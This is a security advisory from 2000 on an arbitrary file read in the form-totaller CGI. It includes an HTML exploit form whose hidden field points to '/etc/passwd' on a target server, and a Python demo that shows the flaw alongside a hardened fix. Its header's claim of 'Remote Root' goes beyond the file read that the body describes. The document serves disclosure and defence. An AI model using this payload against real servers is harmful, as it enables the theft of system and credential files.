Content-Type: Remote Root via vulnerable CGI software
Date     : 13/08/2000
Sender   : s1gnal_9 <s1gnal-9@vs-solutions.com>
Subject  : form-totaller Vulnerable CGI
X-System : UNIX/NT systems running the form-totaller CGI software
X-Status : s1gnal_9-ADVISORY-form-totaller.txt
X-Greets : Narr0w, f0bic, VetesGirl
_________________________________________________________________________________

PRODUCT NAME: form-totaller version 1.0
PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/
                  Also available at freecode.com

DESCRIPTION:
Use "form-totaller" to create tests and quizzes on the web. Build forms with
pull-down menus or radio buttons and this CGI will display output based on
the user's input.

PROBLEM:
The hidden form field "_response_data" names the file from which the CGI
reads the output it displays for a given set of answers. The default value
of this field is:

<input type="hidden" name="_response_data" value="responses.dat">

The script opens whatever path the client supplies in this field; it does
not restrict the value to its own data directory. A remote attacker does not
need to modify the CGI at all: submitting a copy of the form with the value
changed to "/etc/passwd" makes the script read that file and return its
contents in the response. Any file readable by the web server's user can be
retrieved this way.

EXAMPLE:
Below is an example of how we could read files on the remote system.

<-------------------------CUT HERE-------------------------------------->
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">
<input type="hidden" name="_response_top" value="top.html">
<input type="hidden" name="_response_data" value="/etc/passwd">
<input type="hidden" name="_response_bottom" value="bottom.html">
<input type="hidden" name="_divide_by" value="4">
<input type="submit" value="Click for viewing of the /etc/passwd file.">
</form>
<-------------------------CUT HERE-------------------------------------->

SOLUTION:
I would recommend hard-coding the response_data file right into the script
and leaving that command field out of the CGI.

Please visit www.zone.ee/unix :)
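The flaw above, modelled as an added example in Python (form-totaller itself is a Perl CGI, and this is not its code): the POST body the advisory's form produces is parsed, the client-controlled "_response_data" value is resolved the way the vulnerable script does it, and a hardened resolver is shown beside it that only accepts a bare file name inside the CGI's data directory. The data directory /srv/form-totaller, the fake filesystem and the file contents are constructed for the demo.

```python
"""Arbitrary file read via a client-controlled file name (form-totaller style).

Added example, not form-totaller's own code. DATA_DIR, FAKE_FS and the file
contents below are constructed assumptions for the demonstration.
"""
import os
from urllib.parse import parse_qs

# Assumption: the CGI's data files live here and relative names resolve against it.
DATA_DIR = "/srv/form-totaller"

# Constructed stand-in for the server's filesystem: path -> contents.
FAKE_FS = {
    "/srv/form-totaller/responses.dat": "1|Correct!|Try again\n",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/sh\n",
}

# The advisory's attack form, as the URL-encoded body the browser would POST.
ATTACK_BODY = (
    "_response_top=top.html&_response_data=%2Fetc%2Fpasswd"
    "&_response_bottom=bottom.html&_divide_by=4"
)
# The same form with the shipped default value, for comparison.
BENIGN_BODY = ATTACK_BODY.replace("%2Fetc%2Fpasswd", "responses.dat")


def parse_post_body(body):
    """Decode a form-urlencoded POST body into {field: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_response_path(fields):
    """The flawed pattern: open whatever _response_data names.

    os.path.join discards DATA_DIR when the name is absolute, and normpath
    collapses '../' segments, so '/etc/passwd' and '../../etc/passwd' both
    escape the data directory.
    """
    name = fields.get("_response_data", "responses.dat")
    return os.path.normpath(os.path.join(DATA_DIR, name))


def safe_response_path(fields):
    """Hardened resolver: a bare file name only, kept inside DATA_DIR."""
    name = fields.get("_response_data", "responses.dat")
    # Reject empty names, anything containing a separator (basename would
    # differ), dot names, and NUL bytes (which truncate C/Perl open() calls).
    if (
        not name
        or name != os.path.basename(name)
        or name in (".", "..")
        or "\0" in name
    ):
        raise ValueError("illegal _response_data value: %r" % name)
    path = os.path.normpath(os.path.join(DATA_DIR, name))
    # Defence in depth: the result must sit directly under DATA_DIR.
    if os.path.dirname(path) != DATA_DIR:
        raise ValueError("path escapes data directory: %r" % path)
    return path


def is_rejected(name):
    """True when safe_response_path refuses the given _response_data value."""
    try:
        safe_response_path({"_response_data": name})
    except ValueError:
        return True
    return False


def serve(body, resolver, fs=FAKE_FS):
    """Simulate the CGI: resolve the response file and return its contents."""
    fields = parse_post_body(body)
    path = resolver(fields)
    return fs.get(path, "")


if __name__ == "__main__":
    print(serve(ATTACK_BODY, vulnerable_response_path))  # leaks /etc/passwd
    try:
        serve(ATTACK_BODY, safe_response_path)
    except ValueError as exc:
        print("rejected:", exc)
```

The advisory's own recommendation (hard-code the file and drop the field) is the simplest fix and removes the input entirely; the resolver above is for the case where the file must stay selectable, and it relies on the basename check rather than on stripping "../", since stripping is easy to get wrong.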